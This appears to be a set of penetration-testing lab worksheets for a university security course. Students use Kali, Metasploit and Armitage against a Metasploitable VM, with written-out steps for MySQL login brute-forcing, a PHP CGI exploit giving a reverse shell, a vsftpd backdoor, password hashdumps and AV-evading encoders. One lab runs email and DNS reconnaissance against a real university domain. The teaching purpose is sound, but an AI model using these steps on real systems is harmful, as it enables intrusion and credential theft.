Linux Commands
This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.
1. If Metasploitable isn't already running launch the Metasploitable VM.
2. At the user logon prompt type: msfadmin
3. At the password prompt type: msfadmin
4. Type: ifconfig
a. Paste your screenshot here:-
5. Record the IP address here: This is your RHOST or ‘remote host’
Now switch to Kali.
6. Open a shell by clicking on the black box next to the word “Places”.
7. Type: service postgresql start
a. Paste your screenshot here:-
8. Type: msfconsole
a. Paste your screenshot here:-
9. Scan your target for database technologies. Try to identify running database services on your target’s ports.
a. Type: nmap x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)
b. Paste your screenshot here:-
In this lab we are going to set up your Kali and Metasploitable VMs for use in our weekly labs.
We'll run the virtual machines, gather their IPs, and confirm they are able to send/receive traffic between each other.
There are only a few questions but be sure to answer them so the work you perform may be captured for grading purposes.
Preamble.
You will need to download your chosen Virtual Machine Manager (VM) choose the VM that works for your operating system
For Windows
http://www.vmware.com/ - Downloads – VMWare Player
https://www.virtualbox.org/wiki/Downloads
For OSX (Mac)
http://www.vmware.com/ - Downloads – VMWare Fusion (NOTE – This software is not free you can only download a 30 day trial)
https://www.virtualbox.org/wiki/Downloads
Next Download Kali Linux
https://www.kali.org/downloads/
Select Kali Linux 32 Bit and click the direct link for ‘ISO’
Download Metasploitable Linux (This is our target operating system)
https://sourceforge.net/projects/metasploitable/
Click the green button marked ‘download’
Next is installation
https://www.youtube.com/watch?v=a0X9-lCOsEo This Video will guide you through installing Metasploitable using virtual box – the process is similar for VMWare
https://www.youtube.com/watch?v=FVmWMogGX4Q This Video will guide you through installing Kali Linux in Virtual Box – the process is similar for VMWare
During the installation make sure that the password you select for the ‘root’ account is toor
During the installation you will be asked to give your kali VM a ‘hostname’ please make sure that you put your name as the hostname for the machine.
Class: SEC6070
Name:
Date:
1. Open VMware Workstation.
2. Start your Kali and Metasploitable VMs.
Both your Kali VM and your Metasploitable VM should be running.
3. Select Kali linux
4. Type this username at the login prompt: root
5. Type this password: toor
We need to change the default password because it's not secure.
While the password we're changing it to isn't necessarily secure (for the sake of simplicity in this class) we still need to change it on principal.
6. Open a shell. (Look for a small black box at the top left of your screen.)
7. Type: passwd
a. Paste your screenshot here:-
8. Type: wilmuabc (it will ask you to repeat the password)
9. Type: ifconfig
a. Paste your screenshot here:-
10. Record your IP address here:
ANSWER:
NOTE IN ALL FURTHER WORKSHEETS UNLESS OTHERWISE TOLD THIS WILL BE YOUR ‘LHOST’ OR LOCAL HOST
11. Let's double-check no firewall is running.
a. Type: iptables -L (All policies should be set to "ACCEPT".)
b. Paste your screenshot here:-
12. Press ctrl+alt to escape your Kali VM.
Now let's switch our focus to the Metasploitable VM.
13. At the user logon prompt type: msfadmin
14. At the password prompt type: msfadmin
This is an intentionally vulnerable system so there's no point in changing the password from the default.
15. Type: ifconfig
b. Paste your screenshot here:-
16. Record the IP address here:
NOTE IN ALL FURTHER WORKSHEETS UNLESS OTHERWISE TOLD THIS WILL BE YOUR ‘RHOST’ OR REMOTE HOST
Now we know the IP addresses of our Kali and our Metasploitable VMs.
Let's test connectivity.
17. You should still be at the Metasploitable prompt.
a. Type: ping {insert the IP address of your Kali VM}
b. Press ctrl+c to stop the ping.
c. Paste your screenshot here:-
Now let's verify connectivity from the Kali VM.
18. Switch your focus to the Kali VM. (Reminder: Press ctrl+alt to escape the Metasploitable VM.)
19. Click on "Applications-Internet-Firefox Web Browser".
20. Once Firefox opens type the IP address of your Metasploitable VM in the address field and navigate to it.
You should navigate to a running web service.
a. Paste your screenshot here:-
Listed on your webpage should be a list of vulnerable web services that we will be testing against later in the class
Once you have completed this worksheet please submit it for grading via the link on blackboard
Linux Primer with Kali
Class: SEC6070
Name:
Date:
This lab is meant to familiarize you with the Linux operating system.
While it is not meant to make you a Linux power user, it is meant to make you comfortable with moving around the operating system.
We won't go over the file system hierarchy or delve into the more technical aspects of how Linux works but we will go over common commands so you have a working knowledge of Linux.
Linux commands will still be provided to you in future labs but it is important that, as an IT professional, you memorize these commands.
*Special Note: Unlike Windows, Linux shell commands and paths are case sensitive.
1.Open VMware Workstation/Virtual Box and launch the Kali VM.
We'll start by learning to move around Linux.
2. Launch a shell. (It's the black box icon to the right of Applications, Places, System.)
a. Paste your screenshot here:-
3. Type: whoami (This is the account you're logged in with.)
a. Paste your screenshot here:-
4. Type: pwd (pwd stands for "present working directory")
a. Paste your screenshot here:-
5. Type: ls –alF
a. Paste your screenshot here:-
b. What does this command do?
c. What does the ‘switch’ –alF achieve?
6. Type: cd /
a. Where does this command put you in the file system ‘tree’?
7. Hit the up arrow on your keyboard and then hit it again.
Observe that it shows you your previous commands.
This is a big time saver.
8. Type: ls /usr/share
a. Paste your screenshot here:-
Notice all of the tools.
These are your penetration testing tools.
9. Type: cd .. (This will take back to your parent directory.)
10. Type: pwd
a. Paste your screenshot here:-
Where are you now?
11. Type: clear
a. What does this command do?
12. Type: history
a. Paste your screenshot here:-
b.What does history show you?
13. Type: {press the spacebar} date
14. Hit the up arrow twice and hit enter.
a. Paste your screenshot here:-
b. What didn't the history command show you?
c. Why is this important?
15. Type: clear
All software, drivers, drives, etc, are considered files in Linux.
There are many useful commands to perform searches and queries on files in a Linux operating system.
16. Type: locate gunzip
a. Paste your screenshot here:-
17. Type: find /usr/share | more (Hit ctrl+c to stop the output.)
a. Paste your screenshot here:-
18. Type: whereis msfconsole
a. Paste your screenshot here:-
19. Type: whatis motd
a. Paste your screenshot here:-
Linux has many text editors available for use:
20. Type: cat /usr/share/doc/funkload/examples/demo/cmf/passwords.txt
a. Paste your screenshot here:-
b. What did "cat" do?
c. Are able to edit the file?
21. Type: nano /usr/share/doc/funkload/examples/demo/cmf/passwords.txt
a. Paste your screenshot here:-
Nano is considered to be easier to use for users new to Linux text editors.
When you type you immediately begin editing the file.
Press ctrl+x to exit.
Press "n" to not save any changes.
Sometimes you need to learn more about commands you are not familiar with.
22. Type: man top
a. Paste your screenshot here:-
b. What does the man page description indicate the "top" program does?
c. Type: q
23. Type: info man
a. Paste your screenshot here:-
To exit type: q
(Sometime people find it easier to read info pages as opposed to man pages.)
24. Type: top -help
a. Paste your screenshot here:-
b. What is printed to the screen?
Let's look at a few Linux networking related commands that are useful to know:
25. Type: ifconfig
a. Paste your screenshot here:-
b. What is the IP address?
26. Type: route
a. Paste your screenshot here:-
b. What is the gateway?
27. Type: cat /etc/hostname
a. Paste your screenshot here:-
b. What is the hostname?
If your hostname is not your name
Type nano /etc/hosts
Delete ‘Kali’
Replace it with your own name
Save and exit
a. Paste your screenshot here:-
28. Type: cat /etc/resolv.conf
a. Paste your screenshot here:-
b. What is the address of the nameserver (aka DNS server):
29.Find the "sudoers" file.
Read its contents.
a. Paste your screenshot here:-
b. What is the exact location of the sudoers file?
c. What commands may members of the sudo groups execute?
30. Edit the hostname of your machine, type :nano /etc/hostname
delete ‘kali’
add your name in its place
press ctrl x
yes to save changes
enter to quit
a. Paste your screenshot here:-
There are many more commands used in the Linux operating system.
There are also multiple scripting languages available, the most common of which is BASH.
You are encouraged to continue learning more about the Linux operating system as it is responsible for running most of the machines we interact with on regular basis.
Once you have completed this worksheet please upload it via the link on blackboard for grading
Introduction to Metasploit - A Tour
Class: SEC6070
Name:
Date:
What is Metasploit?
Metasploit is an open source framework for exploitation that has transcended its humble beginnings and become a "penetration testing environment suite" - my interpretation. I say this because you are now able to use Metasploit to accomplish any task in the penetration testing phase and based on your findings you may choose a tool/methodology, modify an existing tool/methodology, or create a new tool/methodology to accomplish your goal.
While most penetration testing options like Canvas have additional options and features, none provide you with the freedom and flexibility that Metasploit does. So while Kali is a wonderful Linux-based operating system loaded with tools, a pentester has everything he or she needs in Metasploit. As you will soon learn in this course, Metasploit has reconnaissance tools (discovery and vulnerability scanners), malicious code generators, evasion apps so your exploit doesn't get caught by IPS or antivirus, password attack tools, and many, many more.
PLEASE DON’T CONFUSE METASPLOIT (THE FRAMEWORK) WITH METASPLOITABLE (THE VULNERABLE BY DESIGN OPERATING SYSTEM)
1.Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Launch a terminal (shell). (It's the black box icon to the right of Applications, Places.)
3. Type: msfconsole
Wait patiently for Metasploit to load.
a. Once loaded paste your screenshot here: -
4. Open another terminal and type: env
a. Paste your screenshot here: -
(View the PATH variable. When you attempt to execute a program Linux looks at all of the paths in the PATH environment variable to find and execute the program. That's why you may type "msfconsole" and the program executes.)
5. If you visit the Rapid7 website (https://www.rapid7.com/) you will find you have the option to register for notifications, support, and updates of Kali.
Rapid7 has moved away from using SVN for code management to Git.
For our purpose, here it doesn't matter but if you enjoy working on the bleeding edge of distros you may want to register and upgrade to the latest version.
a. Paste your screenshot here: -
6. Switch your focus back to the Metasploit shell. Look at the information under the banner and answer the questions below about the various modules available.
6a. How many exploits does Metasploit have:
6b. How many auxiliary exploits does Metasploit have:
6c. How many post modules does Metasploit have:
6d. How many payloads does Metasploit have:
6e. How many encoders does Metasploit have:
6f. How many nops does Metasploit have:
Metasploit Modules Breakdown
I've defined Metasploit's modules below.
Take the time to read them so you have a better understanding of their purpose and use.
Exploits - Pre-packaged malicious executables that takes advantage of a vulnerability to gain access to a system and deliver a payload.
Payloads - Can be a variety of applications/configurations used to establish foothold on system post-exploitation. Examples are reverse shells that call home or stagers for further exploitation and persistence. Meterpreter is a particularly useful and commonly used payload shell.
Encoders - Obfuscates exploits and payloads so they can't be fingerprinted by AV or IDS/IPS definitions.
Auxiliary - Attack components such as DoS tools, buffer overflows, SQL injection apps, fuzzers, and more.
Post - Automation modules for post-exploitation. Tools to further establish access on a system or network like keystroke loggers and privilege escalators.
NOPs - NOP sled tools such as buffer overflow reference material for custom NOP sleds. For simplicity's sake we'll say NOP sleds tell a processor to do nothing for a specified number of clock cycles, thereby increasing the chances of your code executing successfully.
With that brief introduction behind us let's learn by doing.
*You may want to maximize your terminal to full screen.
7. Type: help (Notice the list of commands available to you in Metasploit.)
a. Paste your screenshot here:-
8. Type: show exploits (Wait patiently for the Metasploit database to be queried and print the results to your terminal.)
a. Paste your screenshot here:-
b. Notice the format: Name, Date, Rank, Description
c. What is the date of the "windows/http/sonicwall_scrutinizer_sqli" exploit?
d. What is its rank?
e. What is its description?
9. Encoders allow you to encode your payload so it doesn't trigger antivirus or IDS tools like McAfee's HBSS.
This is very important to know and understand because most AV and IDS tools aren't going to catch your payload if you encode it.
a. Type: show encoders
b. Paste your screenshot here:-
c. Find and document an encoder of your choice here:
10. Payloads are the deliveries we will make to the system we are exploiting.
a. Type: show payloads
b. Paste your screenshot here:-
c. Find and document a payload for the Mac OS here:
a. Paste your screenshot here:-
11. We will use auxiliary modules quite a bit. There are a variety of community provided penetration testing tools located here.
a. Type: show auxiliary
b. Paste your screenshot here:-
c. Does the auxiliary module contain scanners?
d. If so list them here :-
Now let's get down to business and pretend we are professional penetration testers researching a strategy to gain access to an industrial control system network such as a water treatment plant.
12. We need to find a Windows SCADA exploit.
a. Type every word after this colon: search windows/scada
b. Paste your screenshot here:-
13. Let's learn more about a particular module we found in our search results to confirm it will be useful to us.
a. Type: info windows/scada/moxa_mdmtool
b. Who provided this exploit?
c. What are the options available for this exploit?
d. What references are available?
e. What does the description tell us this module does?
14. This may be the exploit we need to compromise the system.
a. Type: use windows/scada/moxa_mdmtool
b. Paste your screenshot here:-
c. Type: show payloads
d. Document two payloads you would might use that are available for this exploit:
e. Paste your screenshot here:-
15. Type: show advanced
a. These advanced options, for the most part, won't normally be changed by you. You will want to change them in some cases though. Scroll down to the SSL option. It's currently set to false. If you were running a reverse shell out of a network you may want to enable SSL not only to potentially hide your activity but to also protect your client. The last thing you want to do expose the client's data to a third party because you transferred it in clear text over the internet.
16. Type: show options
a. Paste your screenshot here:-
b. These are the setting the exploit currently has.
17. Type: info
a. Paste your screenshot here:-
17. Type: help
a. Paste your screenshot here:-
b. What command would you type to verify a system is vulnerable to this exploit?
c. What command would use to execute the exploit?
19. Type: exit
Now let's take a look at how Metasploit's file system is organized.
20. Type: cd /usr/share/metasploit-framework/modules
a. Type: ls (You should recognize the high level organization.)
b. Paste your screenshot here:-
21. Type: cd exploits
a. Type: ls
b. Paste your screenshot here:-
(As you can see, you may drill down in each folder to view available tools Metasploit offers. Although this isn't necessary, it is good to understand how the Metasploit is organized for troubleshooting modules.)
You've gained a basic understanding of Metasploit's organization and how to explore this popular open source penetration testing tool suite. We'll gain a higher level of understanding and take part in a more advanced use of Metasploit in subsequent labs.
Please upload this worksheet via the link provided in Blackboard
Database Attack Lab
Class: SEC6070
Name:
Date:
This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.
1. If Metasploitable isn't already running launch the Metasploitable VM.
2. At the user logon prompt type: msfadmin
3. At the password prompt type: msfadmin
4. Type: ifconfig
a. Paste your screenshot here:-
5. Record the IP address here: This is your RHOST or ‘remote host’
Now switch to Kali.
6. Open a shell by clicking on the black box next to the word “Places”.
7. Type: service postgresql start
a. Paste your screenshot here:-
8. Type: msfconsole
a. Paste your screenshot here:-
9. Scan your target for database technologies. Try to identify running database services on your target’s ports.
a. Type: nmap x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)
b. Paste your screenshot here:-
Success! We’re identified multiple instances of database technologies running on our target. Let’s choose a service to target. For this example we’ll select MySQL.
10. Metasploit has multiple MySQL exploits.
a.Type: search mysql
b. Paste your screenshot here:-
11. Type: use auxiliary/scanner/mysql/mysql_login
12. Type: info
13. Type: set rhosts x.x.x.x (substitute x.x.x.x for the ip address of your REMOTE host)
14. Type: set username root
15. Type: set stop_on_success true
16. Let’s confirm the changes you made took. Type: info
17. a. Paste your screenshot here:-
18. Type: exploit
a. Paste your screenshot here:-
You determined the username root has no password. Congratulations. Let’s test our access to the MySQL database.
19. Open a new shell by clicking on the black box to the right of the word “Places”.
20. Type: mysql –h x.x.x.x –u root (substitute x.x.x.x for the ip address of your REMOTE host)
a. Paste your screenshot here:-
21. Type: show databases;
a. Paste your screenshot here:-
22. Let’s pick a database and explore it. Type: use dvwa;
a. Paste your screenshot here:-
23. Now that we’ve picked a database let’s view the tables. Type: show tables;
a. Paste your screenshot here:-
24. Let’s see what data is being held in this table. Type: show columns from users;
a. Paste your screenshot here:-
25. Columns of interest are “user” and “password”. Type: select user, password from users;
a. Paste your screenshot here:-
26. You’ve successfully scanned for a database technology, found a vulnerable database service running on a target’s port, located the appropriate exploit for use and ran it. Now try exploiting a different database vulnerability, such as Postgresql.
Congratulations, you’ve used a Metasploit module to attack a database. You’ve accessed a database, enumerated the tables, identified fields of interest, and inspected their contents.
Metasploit Reconnaissance Lab
Class: SEC6070
Name:
Date:
In this lab we will be doing information gathering with regards to email addresses within the Wilmu.edu domain
1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop.
3. Type: msfconsole
We'll start by performing reconnaissance of a potential target.
We'll run an email reconnaissance module against wilmu.edu for demonstration purposes.
4. Type: use auxiliary/gather/search_email_collector
5. Type: set DOMAIN wilmu.edu
6. Type: set OUTFILE /tmp/results.txt
7 Type: info
a. Paste your screenshot here:-
8. What search engines is search_email_collector using?
a. Paste your screenshot here:-
9. Type: show advanced
a. Paste your screenshot here:-
10. Why might you use a proxy when running search_email_collector?
ANSWER:
10. Type: run
a. Paste your screenshot here:-
11. Your results were already printed to the screen but what if you move on to another pen testing activity?
a. Type: cat /tmp/results.txt
b. Paste your screenshot here:-
As you can see, your results have been recorded to a text file for later referencing.
12. Type: ls /usr/share/metasploit-framework/modules/auxiliary/gather
a. Paste your screenshot here:-
13. What other interesting information gather tools are there?
a. List one of the tools you are interested in and why.
ANSWER:
Now that we know a little bit more about wilmu.edu we'll run a DNS reconnaissance module against wilmu.edu.
14. Type: back
15. Type: use auxiliary/gather/enum_dns
16. Type: info
a. Paste your screenshot here:-
17. Look at the options that are set to true by default. enum_dns will try a zone transfer using ENUM_AXFR. enum_dns will also search for common srv records such as such as ftp, http, smtp, ldap, etc, using ENUM_SRV. ENUM_STD is also set to be used by default. It will search for standard DNS records such as start of authorities (SOAs), name server records (NSs), and A records (aka hosts). As you can see, enum_dns is more powerful and aggressive than dns_info.
18. Type: show options
a. Paste your screenshot here:-
19. Type: show advanced
a. Paste your screenshot here:-
b . What options would you use if you had a strategy, such as a low and slow attack that won't get you noticed?
ANSWER:
20. Type: set DOMAIN wilmu.edu
21. Type: run
a. Paste your screenshot here:-
22. What information was retrieved?
ANSWER:
23. Let's explore more enum_dns options.
a. Type: set ENUM_TLD true
24. Type: run (This could take quite awhile to complete.)
a. Paste your screenshot here:-
b. How many TLDs does enum_dns search?
ANSWER:
Be careful when using this option. You might find spoofed sites that have been set up to look like the original and then get hit with exploits suites like the Black Hole Exploit Kit.
25. Type: show options
a. Paste your screenshot here:-
b. What does ENUM_RVL do?
ANSWER:
26. What does ENUM_BRT do?
ANSWER:
a. Type: ls /usr/share/wordlists
b. Paste your screenshot here:-
These are not files you would want to cat or gedit. They are enormous wordlists used by Metasploit for various brute forcing purposes.
We've done some basic but effective reconnaissance using Metasploit. We've discovered email addresses and servers belonging to Wilmington University. There are many reconnaissance tools available to you such as Maltego. Maltego is a highly effective reconnaissance tool that also searches social network sites.
Once completed please upload this worksheet to Blackboard by the link provided for grading
Metasploit Scanning Lab
Class: SEC6070
Name:
Date:
1. If your VMs aren't already running then open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".
3. Type: msfconsole
4. Open another instance of VMware Player and launch the Metasploitable VM.
5. At the user logon prompt type: msfadmin
6. At the password prompt type: msfadmin
7. Type: ifconfig
a. Paste your screenshot here:-
b. This IP address becomes your RHOST (Remote Host)
8. Record the Metasploitable VM IP address here:
Metasploit has numerous scanners located in various places. Let's become familiar with how to find and identify the scanners we need. Not all scanners are built alike. Some are very limited but very good at what they do while others are broader in functionality and applicable in many instances.
Switch to you Kali VM and type "back" if you currently have a module loaded from a previous lab.
9. Repeat step 2 and open an additional shell and type:
ls /usr/share/metasploitframework/modules/auxiliary/scanner/portscan
10. These are just a few of the built in port scanners Metasploit has to offer.
a. What port scanners are available?
b. Paste your screenshot here:-
11. Lets pick one and list the options and advanced options.
a. Switch to your Kali VM and type: use auxiliary/scanner/portscan/xmas
b. Type: show options
c. Paste your screenshot here:-
d. Type: show advanced
a. Paste your screenshot here:-
12. Type: back
13. Switch to the other shell (Not Metasploit.) and type:
ls /usr/share/metasploit-framework/modules/auxiliary/scanner/discovery
a. Paste your screenshot here:-
14. Notice we have more discovery tools.
a. List a tool and what it does.
b. Paste your screenshot here:-
15. Switch back to your other shell and type: use auxiliary/scanner/discovery/arp_sweep
a. Type: show options
b. Paste your screenshot here:-
c. Type: show advanced
d. Paste your screenshot here:-
16. Let's search for more scanners.
a. Type: search type:auxiliary scanner
If you have trouble reading the output make sure your shell is maximized as well as your instance of VMware.
b. Paste your screenshot here:-
17. What scanner may I use to brute force Outlook Web Access logins?
a. Type: search type:auxiliary outlook
b. Who wrote the module? Type: info
c. Paste your screenshot here:-
d. Type: info auxiliary/scanner/http/owa_login
e. Paste your screenshot here:-
18. What is the pcanywhere_login module good for?
a. Type: search type:auxiliary pcanywhere_login
b. Paste your screenshot here:-
c. Type: info auxiliary/scanner/pcanywhere/pcanywhere_login
d. Paste your screenshot here:-
Now let's learn how to use the "info" command to gather information about modules.
19. Type: info auxiliary/scanner/mssql/mssql_ping
a. What does this module do?
b. Paste your screenshot here:-
Now let's look at everyone's favorite scanner Nmap. Nmap is a tool every pen tester, system administrator, network administrator, etc, should be familiar with.
*If you currently have a module loaded type: back
20. Type "nmap". Notice the exhaustive output. The switch syntax is given along with a description of the command.
21. Type: nmap -sT x.x.x.x (x.x.x.x. is the IP address of the Metasploitable VM.)
a. What were some of your findings?
b. Paste your screenshot here:-
Now that we've used Nmap to find and scan a host let's see if we can connect.
22. At the msf console type: connect help
a. Paste your screenshot here:-
View the options.
23. To verify a port is open on your target and you can connect to it type "connect -z x.x.x.x 21"
This will connect you to the FTP port on your target system, if the FTP service is running.
a. Go ahead and see if you are able to connect to the target using the above command. What are the results.
b. Paste your screenshot here:-
24. Now that you know the FTP port is open you can search for exploits.
a. Type: search platform:linux type:exploit ftp
b. Paste your screenshot here:-
c. List two exploits.
d. Paste your screenshot here:-
We've explored scanning with Metasploit by searching for multiple scanner modules, loading them, and exploring their functions. We also used an industry favorite, Nmap, to target our victim VM. We connected to an open port to confirm connectivity and then looked up available exploits in the Metasploit database. In the labs ahead we'll be using the information we've gathered to continue looking up exploits and leveraging them against vulnerabilities.
Armitage Lab
Class: SEC6070
Name:
Date:
1. Open VMware and launch the Kali VM and login as root with your password wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of the desktop, to the right of the word "Places".
3. DO NOT LAUNCH METASPLOIT
4. Type: service postgresql start
5. Type: msfdb init
a. Paste your screenshot here:-
6. Launch your Metasploitable VM.
7. At the user logon prompt type: msfadmin
8. At the password prompt type: msfadmin
9. Type: ifconfig
10. Record the IP address here:
a. Paste your screenshot here:-
THIS IS THE IP ADDRESS FOR RHOST (REMOTE HOST) - METASPLOITABLE
Armitage is described as a "cyber attack management tool". Armitage is a GUI for Metasploit. It does not replace Metasploit but it does provide a way to visualize your targets. It also makes the use of Metasploit collaborative by being able to support more than one user at the same time. Armitage has other features such as suggestions. While Armitage is heavily integrated with Metasploit it does not entirely replace the command line so the command line is still available from within the GUI. We will explore the use of Armitage in this lab to gain a better understanding of its capabilities as a penetration testing tool.
11. Using the shell you already have open in your Kali VM type: armitage
12. Click "Connect" at the first prompt and then "Yes" to start the service that connects to the Metasploit database. (Accept the defaults. Do not change the IP address from 127.0.0.1.)
a. Paste your screenshot here:-
13. Click "Hosts-Add Hosts" and enter the IP of your Metasploitable VM.
a. Paste your screenshot here:-
14. (ONLY DO THIS IF YOU HAVE UNWANTED HOSTS.) Remove any unwanted hosts that populate from the Metasploit database from previous scans. Right-click on the unwanted host and select "Host-Remove Host".
15. Look at the "Console" tab at the bottom left of the screen. Type "hosts” at the msf prompt and hit Enter. What is the result?
ANSWER:
16. Right-click on the Metasploitable host computer icon top-right frame and select "Scan". This triggers multiple scans. Module after module is loaded, run, and then the results are automatically written to the Metasploit db.
a. What scan launches first?
ANSWER:
b. What does it find?
ANSWER:
b. What FTP version is running?
ANSWER:
c. What SSH version is running?
ANSWER:
d. What version of web server is running and on what OS?
ANSWER:
e. What Windows/Linux domain integration and file server software is running?
ANSWER:
f. What version of MySQL is running?
ANSWER:
g. What version of Postgres is running?
ANSWER:
17. Wait until all of the scans have completed and then go to the "Attacks" menu at the top of the Armitage window. Select "Find Attacks" and wait for a prompt confirming attacks have been added. This can take up to 10 minutes. Be patient and wait for the prompt.
a. Paste your screenshot here:-
18. Right-click on your target and notice "Attack" has been added to the menu.
20. Right-click on your target and select "Attack-FTP-vsftpd_234_backdoor". Accept defaults and click "Launch". If that attack doesn't work then click on "Attacks-Hail Mary".
a. Paste your screenshot here:-
21. Once the Linux box has turned red and appears to have lightning around it click within the "Console" tab at the bottom left of your screen. Type: sessions
a. What IP are you connected to?
ANSWER:
b. What type of connection do you have?
ANSWER:
c. Right-click on the compromised target and select "Shell 1-Post Modules".
22. Select the "hashdump" post module from the tree in the left-hand pane by double-clicking on it. (You will have to scroll down. It's under "gather".) Go with the defaults and click "Launch". What information populated in the new tab?
a. Paste your screenshot here:-
23. Go to the "View" menu. Select "Loot". What is the Loot tab telling you?
a. Paste your screenshot here:-
24. Now let's enumerate the system with Armitage. In the top left window pane navigate to "post-linux-gather" and select the enum_system post module by double-clicking on it. What types of information was gathered?
25. Go to "View" and select "loot".
a. What was added to your loot?
a. Paste your screenshot here:-
b. What is it possible to do with your loot?
ANSWER:
c. What should you do next?
ANSWER:
26. Right-click on the compromised target and select "Shell 1-Interact".
a. Paste your screenshot here:-
27. Type: whoami
a. Who are you logged in as?
ANSWER:
28. Type: pwd
16a. What is the present working directory?
ANSWER:
29. Type: ls
a. Paste your screenshot here:-
30. Type: adduser bob
18a. Follow the prompts to create a new user on your target.
31. Click on the Console tab at the very left of the bottom pane. Type "sessions -K" to kill all sessions.
a. Paste your screenshot here:-
32. Switch to your Metasploitable VM.
33. Type: exit
34. Login with user account "bob" and enter your password.
a. Paste your screenshot here:-
Final thoughts: Notice under the "Hosts" menu you have many important scanning options: Nmap, MSF Scans, DNS Enumeration Try using them against your target. Armitage is a fun and useful tool for quickly throwing exploits at systems to see what sticks and then playing with post modules in a controlled environment. It's also a fantastic way to visualize all of your compromised systems. This is especially important if you have a lot of compromised systems. You have the ability to pass off sessions to your coworkers if you so choose, further strengthening the advantages of this unique and powerful open source penetration testing tool.
Once completed please upload the worksheet via the link provided in Blackboard for grading
Metasploit Msfconsole Lab
Class: SEC6070
Name:
Date:
1. Open VMware and launch the Kali VM and login as root with your password
wilmuabc.
2. Open a shell by clicking on the little black box located at the top left of
the desktop, to the right of the word "Places".
3. Type: service postgresql start
4. Launch Metasploit by typing: msfconsole
5. Type: db_status
a. Paste your screenshot here:-
6. Open another instance of VMware and launch the Metasploitable VM.
7. At the user logon prompt type: msfadmin
8. At the password prompt type: msfadmin
9. Type: ifconfig
10. Record the IP address here:
This IP address is your RHOST (Remote Host)
In this lab we'll be demonstrating the use of the msfconsole. We'll exploit a
vulnerability of the Apache web server, deliver a payload, and confirm we have
a reverse shell.
11. Switch back to Kali.
12. Type this and hit the enter key at the msf> prompt: db_nmap -p 1-1024 -sV x.x.x.x
a. Paste your screenshot here:-
(IP address of the Metasploitable system that you recorded in Step 10.)
We've just done a port scan on our target using Nmap. We've added our results to the Nmap database in case we need to retrieve the results for later review. We only scanned ports 1-1024 and we used the -sV switch on open ports to determine the application and version that is running.
13. What service is running on these ports:
(The command will take a couple of minutes to run.)
Port 21:
Port 22:
Port 23:
Port 25:
Port 53:
Port 80:
Port 111:
Port 139:
Port 445:
Port 512:
Port 513:
Port 514:
All of these ports and the services/applications running on them have the
potential to be exploited but we have to determine the version of the software
running on them.
14. Take notice of the TCP port 80. Apache httpd 2.2.8 (Ubuntu) is running.
Let's see if we can find out more information about the software running on
port 80.
15. Type: use scanner/http/http_version
a. Paste your screenshot here:-
16. Type: info (Make note of the RHOSTS option. We'll use that to specify the IP
of our target.)
a. Paste your screenshot here:-
17. Type: set RHOSTS x.x.x.x (This is our target's IP. You obtained that at step 10)
18.Type: set RPORT 80
19. Type: exploit
a. Paste your screenshot here:-
20. Take notice of the results:
21. We just learned a little bit more about our Apache server running an Ubuntu
OS.
22. Let's find out what exploits exist for PHP. Maximize your VMware window and
type: clear
23. Type and wait: search php type:exploit
a. Paste your screenshot here:-
24. Type: use exploit/multi/http/php_cgi_arg_injection
a. Paste your screenshot here:-
25. Type: info
a. What version of PHP does the description say is vulnerable to this
exploit?
b. Paste your screenshot here:-
26. Now that we believe we may have a working exploit let's view and choose the desired payload that is compatible with this exploit. Type: show payloads
a. Paste your screenshot here:-
27. We'll go with a stable and reliable reverse shell. Type: set PAYLOAD generic/shell_reverse_tcp
28. Type: set RHOST x.x.x.x (IP of target. See step 10)
29. Type: set LHOST x.x.x.x (Your IP.) This is the IP address of KALI
30. Type: set LPORT 1234
31. Type: show options (This will verify your changes. Make sure the options
you have set are showing.)
a. Paste your screenshot here:-
32. Type: show advanced (Verify there is nothing else you want to change.)
a. Paste your screenshot here:-
33. Type: exploit
a. Paste your screenshot here:-
34. You may be asking yourself what, if anything, happened. Type: ls
a. How many files and folders were displayed.
b. Paste your screenshot here:-
35. Type: pwd
a. Document your present working directory.
b. Paste your screenshot here:-
36. Type: whoami
a.Document the name of the account you are logged on with.
b. Paste your screenshot here:-
37. Type: uname –a
a. Paste your screenshot here:-
38. Type: cat /etc/issue
a. Paste your screenshot here:-
Excellent! You've used the MSFconsole to run a port scan and save the contents
of that scan to a database for later retrieval. You further investigated a port
of interest by running an additional scanner against it and determined more
information about the application and version information. You then searched
Metasploit's database for applicable exploits. Once you found an appropriate
exploit you determined the payload you will use, ran it, got a reverse shell,
and verified connectivity by executing some simple commands. Congratulations!
Following these simple steps when trying to penetration test systems will aid
you in better understanding the nuances of exploiting systems.
39. Press ctrl+c. Type "y" when prompted.
40. Type: back
41. Type: exit
Once you have completed this worksheet please upload it via the link on Blackboard for grading
Phase II Lab
Class: SEC6070
Name:
Date:
This is an introduction to locating vulnerabilities and their corresponding exploits. You are going to use the National Vulnerability Database to research vulnerabilities for you week 5 paper. You are then going to look up the corresponding exploit to that vulnerability in the Exploit Database.
1. Open a browser and navigate to: https://nvd.nist.gov/
2. Click on the “Vulnerabilities” link.
3. Enter your technology in the search field. For example: linux
4. Find at least 3 vulnerabilities that pertains to your technology and document them.
5. Now let’s navigate to: https://www.exploit-db.com/
6. Enter the vulnerability you found in the search field. (You can search by CVE or technology.)
7. Locate an exploit for one of your vulnerabilities and document it.
8. Paste your screenshots here:-
Once you have completed this assignment please upload it via the link provided in Blackboard for grading.
Database Attack Lab
Class: SEC6070
Name:
Date:
This lab will follow a database penetration test from beginning to end in order to illustrate, in a hands-on way, the steps necessary to fully compromise a database. You will use a Metasploit module to identify an account you may use to login. Once logged in you will use SQL commands to explore the database.
11. If Metasploitable isn't already running launch the Metasploitable VM.
12. At the user logon prompt type: msfadmin
13. At the password prompt type: msfadmin
14. Type: ifconfig
15. Record the IP address here:
THIS IS THE IP ADDRESS OF YOUR RHOST (REMOTE HOST)
16. Now switch to Kali.
17. Open a shell by clicking on the black box next to the word “Places”.
a. Type: service postgresql start
